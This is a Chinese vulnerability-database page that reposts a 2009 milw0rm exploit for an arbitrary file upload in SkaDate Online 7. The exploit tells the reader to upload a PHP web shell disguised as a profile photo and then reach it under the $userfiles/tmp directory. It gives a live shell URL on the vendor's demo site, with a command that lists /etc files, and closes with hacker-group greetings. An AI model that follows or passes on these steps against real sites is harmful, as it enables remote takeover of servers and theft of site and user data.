SkaDate Online 7 - Arbitrary File Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057449 漏洞类型
发布时间 2009-02-11 更新时间 2009-02-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8039
|漏洞详情
漏洞细节尚未披露
|漏洞EXP 
[~] SkaDate Dating Remote Shell Upload
[~]
[~] Script: http://www.bpowerhouse.com/demos/traveling
[~] ----------------------------------------------------------
[~] home: yildirimordulari.com   online if you wanna hel you must register to my site and ý will do help tp you  xD
[~]
[~] home: yildirimordulari.com   eger yardim istiyosan siteye uye olmalisin xD
[~]
[~] author: ZoRLu  msn: trt-turk@hotmail.com  
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] Date:11/02/09
[~]
[~] My Best Friend: Dr.LY0N
[~] -----------------------------------------------------------


you go here : http://www.yildirim.com/demo/member/join.php

select your photo but photo must be your shell.php

after you saw this: unallowable file extension "php" but no problem

your shell here: http://www.yildirim.com/demo/$userfiles/tmp/[id].php

 
for demo:

here:  http://www.skadate.com/demo/member/join.php

shell: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php

dont forget: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases

( sizce hack benim umrumdamI )

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Dr.LY0N & z3h!r & HEAD_HUNTER and yildirimordulari.com all users
[~]
[~] yildirimordulari.com  &  experl.com & z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-02-11]
检索漏洞
开始时间
结束时间
相关漏洞